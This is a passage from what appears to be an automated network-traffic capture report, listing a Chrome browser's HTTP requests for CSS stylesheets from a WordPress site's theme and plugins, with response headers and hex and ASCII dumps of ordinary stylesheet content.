                                                                                                                                              2025-01-03 16:32:56 UTC3478INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 65 61 6d 20 4d 65 6d 62 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Team Member=========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              49192.168.2.164977089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:56 UTC642OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 6251
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC6251INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 65 73 74 69 6d 6f 6e 69 61 6c 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Testimonials========================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              50192.168.2.164977189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:56 UTC634OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 29265
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC16091INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 49 4d 45 4c 49 4e 45 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================TIMELINE============================================================================================
                                                                                                                                              2025-01-03 16:32:57 UTC13174INData Raw: 65 20 6f 72 69 65 6e 74 61 74 69 6f 6e 20 68 6f 72 69 7a 6f 6e 74 61 6c 20 2d 20 61 6c 74 65 72 6e 61 74 65 20 2a 2f 0a 0a 2e 61 76 69 61 2d 74 69 6d 65 6c 69 6e 65 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2e 61 76 2d 6d 69 6c 65 73 74 6f 6e 65 2d 70 6c 61 63 65 6d 65 6e 74 2d 61 6c 74 65 72 6e 61 74 65 20 2e 61 76 2d 6d 69 6c 65 73 74 6f 6e 65 2d 64 61 74 65 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 30 20 33 30 70 78 20 31 31 30 70 78 3b 0a 7d 0a 0a 2e 61 76 69 61 2d 74 69 6d 65 6c 69 6e 65 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2e 61 76 2d 6d 69 6c 65 73 74 6f 6e 65 2d 70 6c 61 63 65 6d 65 6e 74 2d 61 6c 74 65 72 6e 61 74 65 20 2e 61 76 2d 6d 69 6c 65 73 74 6f 6e 65 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70
                                                                                                                                              Data Ascii: e orientation horizontal - alternate */.avia-timeline-horizontal.av-milestone-placement-alternate .av-milestone-date{ margin: 0; padding: 30px 0 30px 110px;}.avia-timeline-horizontal.av-milestone-placement-alternate .av-milestone-content-wrap


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              51192.168.2.164977289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:56 UTC632OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 4572
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC4572INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 63 63 6f 72 64 69 6f 6e 2f 54 6f 67 67 6c 65 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Accordion/Toggle====================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              52192.168.2.164977389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:57 UTC628OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 1857
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC1857INData Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 56 69 64 65 6f 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
                                                                                                                                              Data Ascii: /* ======================================================================================================================================================Video===============================================================================================


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              53192.168.2.164977489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:57 UTC605OUTGET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 46555
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 02:52:50 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC16091INData Raw: 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 20 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 66 69 78 65 64 5f 68 65 69 67 68 74 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a
                                                                                                                                              Data Ascii: #sb_instagram {width: 100%;margin: 0 auto;padding: 0;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram:after{content: "";display: table;clear: both;}#sb_instagram.sbi_fixed_height{overflow: hidden;overflow-y:
                                                                                                                                              2025-01-03 16:32:57 UTC16384INData Raw: 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 7d 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 7b 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 33 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 34 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 35 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 36 20 23 73 62 69 5f 69 6d 61 67 65 73 20 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 20 72 65 70 65 61 74 28 32 2c 20 31 66 72 29 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63
                                                                                                                                              Data Ascii: nt-size: 12px;}@media all and (max-width: 640px){#sb_instagram.sbi_col_3 #sbi_images, #sb_instagram.sbi_col_4 #sbi_images, #sb_instagram.sbi_col_5 #sbi_images, #sb_instagram.sbi_col_6 #sbi_images {grid-template-columns: repeat(2, 1fr);}#sb_instagram.sbi_c
                                                                                                                                              2025-01-03 16:32:57 UTC14080INData Raw: 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 73 62 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 74 61 2d 69 6d 67 2d 63 74 6e 20 7b 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33
                                                                                                                                              Data Ascii: nter !important;}.sb-elementor-cta-img-ctn {width: 100% !important;position: relative !important;float: left !important;display: flex !important;justify-content: center !important;align-items: center !important;margin-top: 50px !important;margin-bottom: 3


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              54192.168.2.164977589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:57 UTC628OUTGET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.0.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:57 UTC292INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:57 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 3106
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Fri, 25 Nov 2022 09:48:11 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:57 UTC3106INData Raw: 23 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2d 62 61 72 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0a 09 2f 2a 20 62 6f 78 2d 73 68 61 64 6f 77 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 20 30 70 78 20 35 70 78 20 35 30 70 78 3b 20 2a 2f 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 6c 65 66 74 3a 30 70 78 3b 0a 09 66 6f 6e 74 2d
                                                                                                                                              Data Ascii: #cookie-law-info-bar {font-size: 15px;margin: 0 auto;padding: 12px 10px;position: absolute;text-align: center;box-sizing: border-box;width:100%;z-index: 9999;/* box-shadow:rgba(0,0,0,.5) 0px 5px 50px; */display: none;left:0px;font-


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              55192.168.2.164977789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:57 UTC626OUTGET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css?ver=3.0.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:58 UTC293INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:58 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 27249
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Fri, 25 Nov 2022 09:48:11 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
